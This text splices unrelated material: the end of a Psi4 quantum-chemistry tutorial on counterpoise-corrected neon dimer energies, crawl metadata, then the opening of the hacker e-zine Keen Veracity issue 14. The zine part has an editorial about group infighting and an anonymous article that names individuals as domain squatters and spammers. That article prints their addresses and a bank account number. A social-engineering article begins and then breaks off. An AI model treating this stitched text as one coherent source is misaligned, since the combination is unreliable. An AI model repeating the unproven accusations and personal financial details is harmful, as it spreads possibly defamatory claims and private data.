Rvals: e = ecp[R] * psi4.constants.hartree2kcalmol psi4.core.print_out(" {:3.1f} {:1.6f}\n".format(R, e)) CP-corrected CCSD(T)/aug-cc-pVDZ Interaction Energies R [Ang] E_int [kcal/mol] --------------------------------------------------------- 2.5 0.758605 3.0 0.015968 4.0 -0.016215 First, you can see the geometry string ne2_geometry has a two dashes to separate the monomers from each other. Also note we’ve used a Z-matrix to specify the geometry, and we’ve used a variable ( R) as the interatomic distance. We have not specified the value of R in the ne2_geometry string like we normally would. That’s because we are going to vary it during the scan across the potential energy surface, by using a Python loop over the list of interatomic distances Rvals. Before we are able to pass our molecule to Psi4, we need to do two things. First, we must set the value of the intermolecular separation in our Z-matrix (by using Python 3 string formatting) to the particular value of R. Second, we need to turn the Z-matrix string into a Psi4 molecule, by passing it to `psi4.geometry() <>`__. The argument bsse_type='cp' tells Psi4 to perform counterpoise (CP) correction on the dimer to compute the CCSD(T)/aug-cc-pVDZ interaction energy, which is stored in our ecp dictionary at each iteration of our Python loop. Note that we didn’t need to specify ghost atoms, and we didn’t need to call the monomer and dimer computations separately. Psi4 does it all for us, automatically. Near the very end of the output file output.dat,): N-Body: Computing complex (1/2) with fragments (2,) in the basis of fragments (1, 2). ... N-Body: Complex Energy (fragments = (2,), basis = (1, 2): -128.70932405488924) ... N-Body: Computing complex (2/2) with fragments (1,) in the basis of fragments (1, 2). ... N-Body: Complex Energy (fragments = (1,), basis = (1, 2): -128.70932405488935) ... N-Body: Computing complex (1/1) with fragments (1, 2) in the basis of fragments (1, 2). ... N-Body: Complex Energy (fragments = (1, 2), basis = (1, 2): -257.41867403127321) ... ==> N-Body: Counterpoise Corrected (CP) energies <== n-Body Total Energy [Eh] I.E. [kcal/mol] Delta [kcal/mol] 1 -257.418648109779 0.000000000000 0.000000000000 2 -257.418674031273 -0.016265984132 -0.016265984132 And that’s it! The only remaining part of the example is a little table of the different R values and the CP-corrected CCSD(T) energies, converted from atomic units (Hartree) to kcal mol\(^{-1}\) by multiplying by the automatically-defined conversion factor psi4.constants.hartree2kcalmol. Psi4 provides several built-in physical constants and conversion factors, as described in the Psi4 manual section Physical Constants. The table can be printed either to the screen, by using standard Python ``print()` syntax <>`__, or to the designated output file output.dat using Psi4’s built-in function psi4.core.print_out() API (C style printing). As we’ve seen so far, the combination of Psi4 and Python creates a unique, interactive approach to quantum chemistry. The next section will explore this synergistic relationship in greater detail, describing how even very complex tasks can be done very easily with Psi4. [ ]:
http://psicode.org/psi4manual/master/psiapi.html
CC-MAIN-2019-09
refinedweb
2,529
59.09
What follows are my solutions to Codility sample tasks. I did lots of both serious and stupid mistakes getting to decent solutions and my first submits were just sad. For the first one I forgot to return $-1$ in the case where there is no equilibrium index. For the second, this one took me the longest, I had forgotten I had to uncount repeated cases and returned the exception case way too early. I also did not know how to run binary searches using Python (at least now I know.) For the third, the easiest of them all, I was using a list instead of a dictionary as a checked bag and thus spending too much time asking if an element had been checked already while iterating over the list. I felt that the expected complexity requirements for each problem end up giving up too much information about the nature of the solutions. Note: Initially I only had the solution for three problems. I've continued practicing and I'll be adding solutions here as I go over each problem. A zero-indexed array $A$ consisting of $N$ integers is given. An equilibrium index of this array is any integer $P$ such that $0 \leq P < N$ and the sum of elements of lower indices is equal to the sum of elements of higher indices, i.e. $$A[0] + A[1] + \cdots + A[P−1] = A[P+1] + \cdots + A[N−2] + A[N−1].$$ Sum of zero elements is assumed to be equal to $0$. This can happen if $P = 0$ or if $P = N−1$. Write a function def solution(A) that, given a zero-indexed array $A$ consisting of $N$ integers, returns any of its equilibrium indices. The function should return $−1$ if no equilibrium index exists. Complexity: def solution(A): uppersum = sum(A) lowersum = 0 term = 0 for i, x in enumerate(A): lowersum += term term = x uppersum -= term if lowersum == uppersum: return i return -1 Given an array $A$ of $N$ integers, we draw $N$ discs in a 2D plane such that the $I$-th disc is centered on $(0,I)$ and has a radius of $A[I]$. We say that the $J$-th disc and $K$-th disc intersect if $J \neq K$ and $J$-th and $K$-th discs have at least one common point. Write a function def solution(A) that, given an array $A$ describing $N$ discs as explained above, returns the number of pairs of intersecting discs. The function should return $−1$ if the number of intersecting pairs exceeds $10^7$. Complexity: from bisect import bisect_right def solution(A): n = len(A) upper = sorted([i + x for i, x in enumerate(A)]) lower = sorted([i - x for i, x in enumerate(A)]) counter = 0 for v in upper: counter += bisect_right(lower, v) counter -= n * (n + 1) / 2 if counter > 1e7: return -1 return counter A non-empty zero-indexed array $A$ consisting of $N$ integers is given. The first covering prefix of array $A$ is the smallest integer $P$ such that $0 \leq P < N$ and such that every value that occurs in array $A$ also occurs in sequence $A[0], A[1], \ldots, A[P]$. Write a function def solution(A) that, given a zero-indexed non-empty array $A$ consisting of $N$ integers, returns the first covering prefix of $A$. Complexity: def solution(A): checked = {} r = 0 for i, x in enumerate(A): if not x in checked: checked[x] = True r = i return r A binary gap within a positive integer $N$ is any maximal sequence of consecutive zeros that is surrounded by ones at both ends in the binary representation of $N$. Write a function def solution(N) that, given a positive integer $N$, returns the length of its longest binary gap. The function should return $0$ if $N$ doesn't contain a binary gap. def solution(N): zeros = bin(N)[2:].split('1') zeros = zeros[:-1] # Just in case there are trailing zeros return max(map(len, zeros))$. Complexity: # This one is silly: def solution(X, Y, D): distance = Y - X if distance % D == 0: return (Y - X) / D else: return ((Y - X) / D) + 1 # Abussing Python's broken division. A zero-indexed array $A$ consisting of $N$ different integers is given. The array contains integers in the range $[1\ldots(N + 1)]$, which means that exactly one element is missing. Your goal is to find that missing element. Write a function def solution(A) that, given a zero-indexed array $A$, returns the value of the missing element. Complexity: def solution(A): A = sorted(A) # The complexity is O(N log(N)), unfortunately. But Codility wasn't able to tell. for i in range(len(A)): if A[i] != i + 1: return i + 1 return len(A) + 1 A non-empty zero-indexed array $A$ consisting of $N$ integers is given. A permutation is a sequence containing each element from $1$ to $N$ once, and only once. The goal is to check whether array $A$ is a permutation. Write a function def solution(A) that, given a zero-indexed array $A$, returns $1$ if array $A$ is a permutation and $0$ if it is not. Complexity: def solution(A): n = len(A) check = {i+1:False for i in xrange(n)} for x in A: if x not in check: return 0 else: if check[x] == True: return 0 else: check[x] = True for x in check: if check[x] == False: return 0 return 1 Write a function def solution(A) that, given a zero-indexed array $A$ consisting of $N$ integers, returns the number of distinct values in array $A$. Complexity: # Minimal solution # A detailed version would require ordering the array # and run over it while counting the times the value changes. # (Which I guess is more or less the way Python turns a list into a set.) def solution(A): return len(set(A)) A string $S$ consisting of $N$ characters is called properly nested if: Write a function def solution(S) that, given a string $S$ consisting of $N$ characters, returns $1$ if string $S$ is properly nested and $0$ otherwise. Complexity: def solution(S): stack = 0 for x in S: if x == '(': stack += 1 if x == ')': stack -= 1 if stack < 0: return 0 if stack == 0: return 1 else: return 0$s and/or $1$s, where:: We assume that all the fish are flowing at the same speed. That is, fish moving in the same direction never meet. The goal is to calculate the number of fish that will stay alive. Write a function def solution(A, B) that, given two non-empty zero-indexed arrays $A$ and $B$ consisting of $N$ integers, returns the number of fish that will stay alive. Complexity: # First time I got 100% with my first submit. def solution(A, B): fish_downstream = [] up_survivors = 0 for i, direction in enumerate(B): if direction == 1: fish_downstream.append(A[i]) else: is_active = 1 up = A[i] while is_active: if len(fish_downstream) != 0: down = fish_downstream.pop() if down > up: fish_downstream.append(down) is_active = 0 else: is_active = 0 up_survivors += 1 return len(fish_downstream) + up_survivors You have to climb up a ladder. The ladder has exactly $N$ rungs, numbered from $1$ to $N$. With each step, you can ascend by one or two rungs. More precisely: Your task is to count the number of different ways of climbing to the top of the ladder. Write a function def solution(A, B) that, given two non-empty zero-indexed arrays $A$ and $B$ of $L$ integers, returns an array consisting of $L$ integers specifying the consecutive answers; position $I$ should contain the number of different ways of climbing the ladder with $A[I]$ rungs modulo $2^{B[I]}$. Complexity: def count_down(n, dicc): for m in [1,2]: if n-m in dicc: dicc[n] = dicc.get(n,0)+dicc[n-m] return dicc def climbing_ways_counter(L): dicc = {0:1} for n in xrange(L): count_down(n,dicc) return dicc def solution(A, B): L = len(A) + 1 # Weird optimization trick. Modulo operation is too slow... # Had to look up online for it: B = [(1<<b)-1 for b in B] d = climbing_ways_counter(L) return [d[a] & b for a,b in zip(A,B)]
http://nbviewer.jupyter.org/github/finiterank/iPython-Notebooks/blob/master/Codility.ipynb
CC-MAIN-2018-51
refinedweb
1,384
59.53
How to add onMouseEnter or onMouseOver in ReactJS You need an event when a user’s mouse hovers over an HTML element or React component. So you run into onMouseOver and onMouseEnter. They both behave the same, so which one is the right one for you? difference between mouseover and mousenter Both of these events behave the same way. When user enters an element they both get triggered. <style> #my_div { height: 120px; width: 120px; background-color: #333; } </style> <div id="my_div"></div> <script> const divEl = document.querySelector('#my_div'); divEl.addEventListener('mouseenter', () => console.log('Event: mouseenter')); divEl.addEventListener('mouseover', () => console.log('Event: mouseover')); </script> The output should look like this when you hover over the box. Event: mouseover Event: mouseenter Event: mouseover Event: mouseenter The difference between mouseenter and mouseover is when child elements are put inside the targeted element. I’m going to update HTML template and update the styles. <style> #my_div { height: 120px; width: 120px; background-color: #333; display: flex; align-items: center; justify-content: center; } #my_div > div { height: 50px; width: 50px; background-color: #ccc; } </style> <div id="my_div"> <div></div> </div> You should have a smaller box in the center of the #my_div element. When you hover all the way to the middle, and hover out of the all the boxes, you should see the following output. Event: mouseover Event: mouseenter Event: mouseover Event: mouseover mouseover gets triggered multiple times. That’s because it gets triggered when the mouse hovers over the selected element OR it’s child elements. Okay, let’s implement this in a React component now. React onMouseEnter and onMouseOver examples The goal in this example is to make .innerBox appear and disappear when triggering one of these events. Both will have the same CSS. .container, .wrapper { display: flex; justify-content: center; align-items: center; } .container { width: 200px; height: 200px; background-color: #ccc; margin: 60px auto 0; display: flex; } .wrapper { height: 150px; width: 150px; background-color: #666; } .innerBox { width: 80px; height: 80px; padding: 8px; background-color: #222; display: none; } .container.show .innerBox { display: block; } React onMouseEnter example To add a mouseenter event listener in React, you must embed our event handler function to onMouseEnter. class App extends React.Component { state = { showBox: false }; handleBoxToggle = () => this.setState({ showBox: !this.state.showBox }); render() { return ( <div onMouseEnter={this.handleBoxToggle} className={`container${this.state.showBox ? " show" : ""}`} > <div className="wrapper"> <div className="innerBox" /> </div> </div> ); } } As soon as you hover over the .container element, it will make .innerBox appear. React onMouseOver example To add a mouseover event, swap out onMouseEnter for onMouseOver. <div onMouseOver={this.handleBoxToggle} className={`container${this.state.showBox ? " show" : ""}`} > <div className="wrapper"> <div className="innerBox" /> </div> </div> When you hover over .container, .innerBox will appear. But .innerBox will disappear when you hover the mouse over .wrapper. Because .wrapper is an inner child element of .container, and it will trigger the toggle method. I like to tweet about React and post helpful code snippets. Follow me there if you would like some too!
https://linguinecode.com/post/how-to-add-onmouseenter-or-onmouseover-in-reactjs
CC-MAIN-2022-21
refinedweb
494
50.53
The normal way that you create an ADO.NET Data Services (aka Astoria) Service is by creating a class that derives from DataService<T>. public class BloggingService : DataService<BloggingEntities> And if you want to use Entity Framework under the hood the T you supply must derive from ObjectContext. Now this works great most of the time, but not with CodeOnly, and here’s why. Under the hood the DataService constructs an instance of the BloggingEntities, and gets the model from it, via its MetadataWorkspace. The problem is if you’ve configured the model using Code-Only, the only way to construct the BloggingEntities is via the Code-Only ContextBuilder, which Astoria knows nothing about. Hmm…. Thankfully there is a very simple workaround, you simply override CreateDataSource() on DataService<T> like this: protected override BloggingService CreateDataSource() { //Code-Only code goes here: var contextBuilder = GetConfiguredContextBuilder(); var connection = GetSqlConnection(); return contextBuilder.Create(connection); } As you can see this is pretty simple. Fine Print For performance reasons it is important to avoid the cost of re-configuring the ContextBuilder each time, so the GetConfiguredContextBuilder() method should create and configure the builder only once, and cache the builder for subsequent calls. Caveats This tip will only work on .NET 4.0 Beta 2 and above. Code-Only only works on .NET 4.0 and is only available as a separate download. ADO.NET Data Services (aka Astoria) is *going* to ship as part of .NET 4.0, but isn’t in Beta1, so you can’t use CodeOnly with Astoria yet, you have to wait for Astoria to show up in .NET 4.0 in Beta2, and you will probably want to wait for another drop of Code-Only too. Which simply means you will have a wait a little while before you can try this tip out.
https://blogs.msdn.microsoft.com/alexj/2009/10/14/tip-38-how-to-use-codeonly-with-astoria/
CC-MAIN-2017-09
refinedweb
303
63.09
Tax Have a Tax Question? Ask a Tax Expert Hi, First some good news, Tennessee doesn't have an income tax The state does, however, levy a tax on interest and dividend income over $1,250 per person. And just as a heads up, like most states with no income tax, Tennessee does have a relatively high sales tax rate of 7% on general merchandise and 5.5% on food. In addition, individual counties levy their own sales tax above and beyond the state sales tax. Thnaks, so likely KY will continue to tax my nicome even though I am livign in TN? The W-2 for investmetn income would be delivered to my KY residence as we are maintaing that as our home If you keep your residency (measured by facts and circumstances, such as keeping the home, intent to come back, wife staying, etc) ... ah beat me to it ... yes the W-2 being sent there makes it very clean You'll still be taxed non all income as a KY resident From a tax perspective it will really eb as though nothing changed ... ALTHOUGH you may be able to use form 2106 (unreimbursed employee expenses) to deduct anything required by the company but NOT reimbursed Here ya go, in the event that it's useful: Form 2106 and Instructions for Form 2106 (HTML) Great, Thnaks. So to sum it all up. I woudl have to see if Kellogg would list my address as KY, and withold taxes for KY, or, if they listed my address as TN, since they are calling this a relocation, and not with hold inome taxes for either state, would KY have any argument to then tax that salary income even though I was workign out of state because we maintained teh KY home? That's where I am really confused Yes, don't shoot the messenger here, but KY WILL say that you are still a KY resident, and therefore taxed on all income ... IF you were going to a state with an income tax that would require you to file an NR return (Non-resident tax return), then KY does have a credit for taxes paid to another state - so there's no DOUBLE taxation ... but in this scenario you'll be considered a KY resident by KY dapt of revenue, because of keeping the domicile and your intent to return No shooting, I promise :). Kind of figured that woudl be teh case, had a similar scenario a few years back with Michigan, but they did have income taxes, so I was filing estimated payments with KY while MIchigan was being withheld, and then got everythgn back from Michigan through teh NonResident filing. Thanks a lot for your help. Helps to make the decision about accepting or not a little easier. You employer IS supposed to withhold for your state of residency, that's the law ... however, if they play hardball with you about that, then (as you've just mentioned) you can pay estimated to KY Congrats on the offer ... bet TN will be nicer than MI? It was a screw up in their payrolll depatemnt got it cleared up after the first year. IDK about nicer, although they did have snow in MI last night, none Here YET! THANKS AGAIN You've Hi Greg, ... just checking back inhere, as I never saw you come back into the of you have any other questions, Lane
https://www.justanswer.com/tax/83zcg-hi-opportunity-kellogg-require.html
CC-MAIN-2017-30
refinedweb
575
74.12
This year saw record cuts in payouts, but companies may be more generous to shareholders in 2010 What was generally a good year for stocks was a terrible year for dividend-focused investors. In 2009, dividend payouts from the large-cap Standard & Poor's 500-stock index are set to fall $52.6 billion, or 21.4%, from 2008, according to Standard & Poor's projections. In dollars, that is the largest decline ever, and in percentage terms it's the biggest drop since 1938, when dividends fell 38.6%. Adding insult to injury for shareholders: Dividend-yielding stocks tended to lag the broader stock market in the past year, reflecting a market bias toward tech stocks and risky companies—which generally weren't paying dividends to begin with. "What is typically a defensive strategy in down markets turned out to be the wrong way to go," says Keith Goddard, co-manager of the Capital Advisors Growth Fund (CIAOX). Dividend stock strategies are popular among conservative investors seeking consistent income. But the financial crisis robbed these shareholders of billions, as financial firms, particularly banks and real estate investment trusts, slashed payouts. From September 2008 to March 2009, S&P 500 companies stopped paying $65.4 billion in dividends. Of that amount, 68% was due to cuts at financial firms. "The big cuts have really been detrimental to dividend investors," says Mitch Schlesinger, chief investment officer at FBB Capital Partners. Dividend Rebound For the first time in a while, these investors have reasons for hope. Dividend-watchers like Standard & Poor's index analyst Howard Silverblatt predict dividends will rebound in 2010. The main reason: Companies that used to pay big dividends—like General Electric (GE), Bank of America (BAC), and Citigroup (C)—have already made deep cuts. "The dividends, we believe, will come back, but they're going to be slow" in returning, Silverblatt says. It could be 2013 before dividend payouts return to their previous peak, he says. Optimism about 2010 dividends requires at least some belief that the economy won't get worse and may even improve significantly. "If a company has made it to this point in the economic cycle without having to cut its dividend, I'd say [its chances for] cuts are behind us," Goddard says. But Cliff Draughn, chief investment officer at Excelsia Investment Advisors, is more skeptical. He worries about where the cash for dividends will come from. Companies have maintained payouts by cutting jobs and other expenses as revenues have fallen. In 2010, the economy is likely to remain weak, he says. So, if there is any increase in costs, such as higher health-care expenses or commodity prices, "you're probably going to see more cuts in dividends," Draughn says. Attractive Yields The current dividend yield on the S&P 500 is 2.16%. That's low by historical standards. Since 1935, the yield has averaged 3.8%. Current dividend yields are attractive, however, compared with the rock-bottom interest rates now on many bonds and money-market funds. Dividend investors are closely watching banks for signs that the financial sector can start rebuilding dividends devastated by the crisis. Hopes were raised by the recent news that all major banks—including BofA, Citi, and Wells Fargo (WFC)—have paid back federal Troubled Asset Relief Program, or TARP, bailout funds. Banks have profited off low interest rates, and have been setting aside billions of dollars to cover loan losses, Goddard says. Once those loan losses level off, banks may start raising payouts again, he says. Draughn, however, worries about commercial real estate problems looming on bank balance sheets. Banks paid back TARP funds not necessarily because they could afford to do so, he says, but to get out from under federal limits on executive pay. "The reason they paid back TARP was not in the interests of shareholders," he says. The prospects for dividends vary from sector to sector. Schlesinger believes utilities may be able to boost payouts as uncertainty clears up about federal climate change legislation. "There have been political worries," he says, and utilities "have been hoarding their cash a bit." Dividends on consumer discretionary stocks could be hurt by slow sales, Draughn warns. "The consumer is still retrenching," he says. "They're still rebuilding balance sheets." Bright Spot: Consumer Staples Consumer staples stocks, however, have been a rare success story for dividend investors. In 2009, consumer staples stocks have risen only 13%, compared with a 22.5% rise for the S&P 500 as a whole. But the sector fell less in 2007 and 2008, and its dividend payments have remained generous. Only one consumer staples stock in the S&P 500—grocery retailer Supervalu (SVU)—has cut its dividend, while 33 of 34 actually increased payouts, S&P's Silverblatt notes. As a result, consumer staples is the only sector to offer investors a positive total return (including price appreciation and dividend payments) since the market peak of 2007. Through history, dividends have been an important part of stock investors' total market returns. They offer shareholders income and can help keep stock prices stable. The next few years, however, could require patience from investors eager for income. Dividends may gradually recover, but they're crawling their way out of a very deep hole.
http://www.bloomberg.com/bw/stories/2009-12-21/dividends-a-slow-recovery-in-2010businessweek-business-news-stock-market-and-financial-advice
CC-MAIN-2015-14
refinedweb
883
55.03
A wrapper around etcd3 package Project description etcd3_wrapper A thin wrapper around Python module etcd3 to make it a little easier to deal with etcd. Warning: The API isn't fully stable and can changed significantly in future. For Example, you want to get an entry from etcd. You would write something like this from etcd3_wrapper import Etcd3Wrapper client = Etcd3Wrapper() entry = client.get("/planet/earth") if entry: # It would print key and value of entry # in bytes format b'....' print(entry.key, entry.value) Output b'/planet/earth' b'{"population": "7.53 Billion"}' # If you know that the value in etcd is in JSON # format. You can do the following json_entry = client.get("/planet/earth", value_in_json=True) if json_entry: # Now, entry.value is of type dict print(entry.key, entry.value) # So, you can do this too print(f"Earth population is {entry.value['population']}") Output /planet/earth {"population": "7.53 Billion"} Earth population is 7.53 Billion Project details Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/etcd3-wrapper/
CC-MAIN-2020-05
refinedweb
181
61.02
Keen Veracity Issue 14 - This issue has articles entitled Squatters Exposed!, The Art of Social Engineering, ciscoBNC.c, Wireless Technology Exposed, and more. 05fea62d4b2eff64b235e68f40ad467e -------------------------------------------------------------------------------- _ _ _ _ _ | | / ) | | | | (_)_ | | / / ____ ____ ____ | | | |___ ____ ____ ____ _| |_ _ _ | |< < / _ ) _ ) _ \ \ \/ / _ )/ ___) _ |/ ___) | _) | | | | | \ ( (/ ( (/ /| | | | \ ( (/ /| | ( ( | ( (___| | |_| |_| | |_| \_)____)____)_| |_| \/ \____)_| \_||_|\____)_|\___)__ | (____/ -------------------------------------------------------------------------------- I S S U E (14) L e g i o n s o f t h e U n d e r g r o u n d ----------------------------------------------------[]----------- -------------------------------------------------------------------------------- lothos Digital Ebola Firewa11 DataShark Overdose1 Phriction ntwak0 pr00f havoc TouchTone archim phemetrix crabby gridmark bantrix -------------------------------------------------------------------------------- [CONTENTS]------------------------------------------------------------[CONTENTS] [1]====================================[Editorial - Lothos <lothos@lothos.org> ] [2]============================================[Squatters Exposed! - Anonymous ] [3]========================[The Art of: Social Engineering - danny@away.net.au ] [4]=======================================[ciscoBNC.c - chrak <chrak@b4b0.org> ] [5]===================[Wireless Technology Exposed - Vortek <vortek@gmail.com> ] [6]==================================[Harriet the Spy - Dreid <dreid@dreid.org ] [7]=============================================[Review of ToorCon - Overdose1 ] [8]=====================================================[This issues LAMER.log ] [9]==============================================================[/dev/urandom ] [CONTENTS]------------------------------------------------------------[CONTENTS] -------------------------------------------------------------------------------- [Editorial]=========================================[Lothos <lothos@lothos.org>] -------------------------------------------------------------------------------- When I decided to take over the job of editing Keen Veracity, Legions of the Underground was dead. Maybe not maggot-ridden dead, but on life support kind of dead. The last issue of Keen Veracity, kv13, was released over a year ago, and that was just a rehash of old articles with little original content, so it hardly counts. I can understand the old school articles, becuase it's difficult to pull something together when the group doesn't contribute. The last kv with original content, kv12, was published 7-27-2002, over three years ago. That issue had over 21 original articles written by group members and others. This issue, as you can see, has 9, which is sad because Keen Veracity used to be a quality magazine that was well respected in the security community. I have tried to breath some life into Legions of the Underground. For years now the members have done nothing constructive, have released no code, no advisories, nothing. I have tried to get it going again with a new issue of Keen Veracity, but the only other member to contribute something was overdose1. (Thanks bro) The irc channel, #legions on undernet, had degraded as well. People brought their girlfriends in the channel, there was a lot of drama involved with that and there was a lot of other infighting and dick-waving. DigiEbola, our "leader," was one of the biggest dick-wavers when he was supposed to be holding everything together instead of banning people for no reason other than he didn't like what they said. A lot of members have confided in me that they're not happy with digi but are afraid to say anything for fear of being banned. I registered the #legions channel with undernet channel services in an effort to provide some stability for the channel. Everyone who had ops received ops on X, no one was banned anymore for their opinions, and I figured it was a good move to make. A few people didn't see it as I did. Digi was upset because he lost control over the channel. Another member accused me of "taking over" the channel. I don't see how it could be considered a takeover, since everyone who had ops before the registration was given ops after the channel registration. Nothing changed, with the exception that people now got auto opped when entering the channel. Big deal. Anyways, I'm the most senior member still in the group. From the first published members list of Legions of the Underground, from KV3: optiklenz cap n crunch tip icer Bronc Buster sreality Zyklon havoc HyperLogik Defiant Duncan Silver Slfdstrct lothos I don't see DigiEbola listed there, and I don't see how my registering the channel on undernet was considered a "takeover." As the most senior group member left, there is an argument that I should inherit Legions of the Underground to counter the "takeover" cry. Our current "leadership" definetly isn't doing the job. I have put a lot of time, energy, effort and hard work into this group and I wasn't content to sit back and let it die. I had considered becoming the new group leader, weeding out the stagnant members and adding some new blood from the people I had recently brought to the irc channel. Unfortunetly digi controls the domain name, and while I could always get a new domain, I frankly don't believe it's worth the effort anymore. I hereby resign my membership from Legions of the Underground. It's been a wild ride and I enjoyed every minute of it, but it's time to move on to bigger and better things. I've made a lot of good friends along the way, and hope nothing will change that. I have tried as best as possible to refrain from airing our dirty laundry in the public, but some things just had to be said. Nothing personal was meant by any of this, and Digi, please don't take my comments personally. I know we've butted heads over the future of legions, it wasn't personal, and I still consider you a friend. I will be transfering ownership of the #legions undernet channel to you, effective immediately. Lothos - lothos@lothos.org And now, on with the show. I have decided not to include my article in this issue, it may be released later on my website. Anyways, I hereby present you with what is likely the last issue of Keen Veracity. Enjoy! -------------------------------------------------------------------------------- [Squatters Exposed!]=================================================[Anonymous] -------------------------------------------------------------------------------- Squatters Exposed! by anonymous I had my domain name stolen by squatters. Now, before you start complaining that I should have renewed it if I wanted to keep it, let me explain. When your domain expires, it goes into a redemption period where it can be renewed. In my case, the redemption period was cut short and I was unable to renew my domain. My domain was stolen by a group of squatters who also happen to be spammers, pornographers, and domain registrars. How this group became domain registrars is beyond me. Now, before I get ahead of myself, a little background information and some detective work: This is the relevant whois data from my domain: Sponsoring Registrar:Intercosmos Media Group Inc. (R48-LROR) Registrant ID:ODN-676871 Registrant Name:Orion Web Registrant Organization:Orion Web Registrant Street1:1st Floor Muya House Registrant Street2:Kenyatta Ave. Registrant Street3:p. o. box 4276-30100 Registrant City:Eldoret Registrant State/Province:KE Registrant Postal Code:30100 Registrant Country:KE Registrant Phone:+254.0735434737 Registrant Phone Ext.: Registrant FAX: Registrant FAX Ext.: Registrant Email:info@kenyatech.com The admin and tech contacts are the same as above. Name Server:NS0.DIRECTNIC.COM Name Server:NS1.DIRECTNIC.COM This shows that a company called Orion Web in Kenya, Africa now owns my domain. Pulling up the web page for my domain shows a page filled with ads, with a "Click here to buy this domain" button that leads to, the company that now owns my domain name. They also own lots of other domain names. Lots and lots, in the range of 140,000 or more. Kenyatech claims that they're located in Kenya, Africa. They also accept PayPal. Paypal does not do business with firms located in Kenya. Using GeoBytes reports that the ip address for, 209.16.83.2, is located in Larose, Louisiana. Looking up the same address in the ARIN database shows this IP is assigned to I-55 Internet Services in Hammond, Louisiana. A little research on the site, browsing through all the domains, shows a few patterns. The oldest dated domain I could find registered to them was in August of 2004. The most current I could find was August 23 2005, a week before this writing. Most are registerd to kenyatech, but some of the older ones are registered to: NOLDC, Inc. 838 Camp Street 4th Floor New Orleans, LA 70130 US 504-523-0360 Some of the domains are registered to Domain Contender, with the majority being registered through InterCosmos Media Group, DBA directnic.com. Curious about where they're from? They're both owned by the same people, and the address is: 650 Poydras Street Suite 1150 New Orleans, LA 70130 US (504) 679-5170 Is it just me, or is there a pattern developing with all these Louisiana addresses?? The Camp Street address and the Poydras street address are within blocks of each other. I filled out a form on offering to buy the domain for $50. This offer was turned down. They instead suggested that I pay $300 plus a $30 fee, according to the following: Hello, NOLDC, Inc. accepts wire, money order or certified or cashiers check (international checks please add an additional US$50 processing fee) only. Checks and money orders must be made payable to NOLDC, Inc., and sent to: NOLDC, Inc. 838 Camp St., 4th Floor New Orleans, Louisiana 70130 NOLDC, Inc. Wire Information (Note: Please be sure to add wire fees to final price of domain purchase. Also, be sure to include the domain name that you are purchasing in the Additional Information Section.) Wire Fees for US Banks is $10.00 Wire Fees for Banks outside of the US is $50.00 Bank: Hibernia Bank 2412 Manhattan Blvd Harvey, La 70058 USA ABA#: 065000090 Account#: 2080083613 Swift Code: HIBKUS44 Beneficiary: NOLDC, Inc. 650 Poydras St Ste 1150 New Orleans, La 70130 USA Sincerely- NOLDC, Inc. This links the Camp Street address with the Poydras Street address, by their own admission. Now, who owns Intercosmos a.k.a directnic.com, who owns Domain Contenders, and who owns NOLDC, Inc? A man by the name of Sigmund Solares. I suspect that kenyatech.com is also owned by Sigmund Solares, given all the evidence provided above. Sigmund Solares has a history of domain squatting, and a history of hiding behind non-existant entities for the purpose of hiding his squatting. This WIPO arbitration decision clearly outlines this: Complainant claims that Respondent has no rights or legitimate interests in the disputed domain name. According to Complainant, this conclusion is suggested by Respondent's name: "Legal Services." Additionally, based on an investigation conducted by Complainant, Complainant claims that Legal Services is a fictitious identity adopted for the sole purpose of registering the disputed domain name. According to the investigation report there is no business by the name of Legal Services at the address listed in the .biz Whois database. Further, there is no business by the name of Legal Services at the address provided in the registration information. The only business listing found at that address is a business called "Ingrid's Beauty Salon." Likewise, the telephone number listed in the .biz Whois database is the number for an individual named "Sigmund Solares" who claims that he is not affiliated with Respondent. In fact, according to Complainant, Sigmund Solares is a principal in and primary contact for the Registrar of Respondent's domain name. Based on the above, Complainant asserts that Respondent has taken active steps to conceal its true identity and provided false contact details in connection with its domain name registration. Complainant concludes that the use of false and misleading contact information suggests that the domain name was registered for improper purposes. Complainant also asserts that the fact that its trademark has a strong reputation and is widely known is further support of Respondent's bad faith. Finally, Complainant notes that the administrative, billing and technical contacts for the registration is Joseph Tambert whose e-mail address is listed as "josephtambert@homeville.com". Complainant states that the website at <homeville.com> is a pornographic website. Thus, Complainant claims that a risk exists that Complainant's valuable and well-known trademark and service mark will be associated with a pornographic site and will be tarnished as a result. SOURCE: Joseph Tambert may be Sigmund's partner. This is his address: Joseph Tambert 838 Camp Street New Orleans Notice the Camp Street? Sigmund and Joseph are linked together on the whois info for fbi.biz, as well as the above arbitration case. Joseph's email address, as explained in the above WIPO arbitration quote, links to a pornographic website. Sigmund's email, as listed on the whois for sigmundsolares.com, also points to a porn site. This group has had IP addresses blocked for sending spam. They have a history of domain squatting. How the hell did they become domain registrars? As domain registrars, this gives them access to the whois database. I believe that they use that access to aquire a list of domains entering the expiration period. They would then be able to flag that domain as being under their control, allowing them to transfer ownership to the Kenyatech entity and cutting short the redemption period. There is also evidence that suggests they abuse the whois database. The whois database is used to find information on a domain name, including if it is available for purchase. They may have access to what names are looked up, and if it is available, and there is evidence to suggest that they register these names for themselves before others have a chance to. They also have a script on every domain they own, to judge the domain's popularity. This script stores its data on a machine owned by directnic.com. The more popular sites have to pay more money to buy the domain back. I have seen less popular sites go for as little as $50, and I've seen some offers of a thousand dollars turned down. The more popular sites are renewed, and the less popular are allowed to expire. Being domain registrars, they might not have had to pay anything to aquire the 144,000+ domains they own. So, what can you do? If your domain was snatched, by all means don't visit it or the kenyatech web site. Hopefully it will be allowed to expire. Contact anyone linking to your website, and have them change the link. If you have a popular domain, your only hope may be to go through arbitration, or sue. There is a class action lawsuit being organized by rederon.net. Complain to ICANN.org, and hopefully we can have their domain registrar status revoked. By all means, don't pay them and support their bad habits! [ Editor's note: I also had my domain stolen by kenyatech.com, so when I received this I couldn't resist including it. The domain name was for RootFest, my computer security convention held in Minneapolis, Minnesota. I am selling RootFest t-shirts to raise the funds needed to get my domain back. If you're interested in supporting me, or just want to know more about my specific case, please visit. -lothos ] -------------------------------------------------------------------------------- [The Art of: Social Engineering]====================[danny\ <danny@away.net.au>] -------------------------------------------------------------------------------- %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% The Art Of: %% %% Social Engineering %% %% %% %% danny\ <danny@away.net.au> %% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% ********************************** %%%%%%%%%%%%%%%%%%% %% Introduction: %% %%%%%%%%%%%%%%%%%%% Social engineering is one of the most effective way's to pulling off some of the largest security breaches. With a 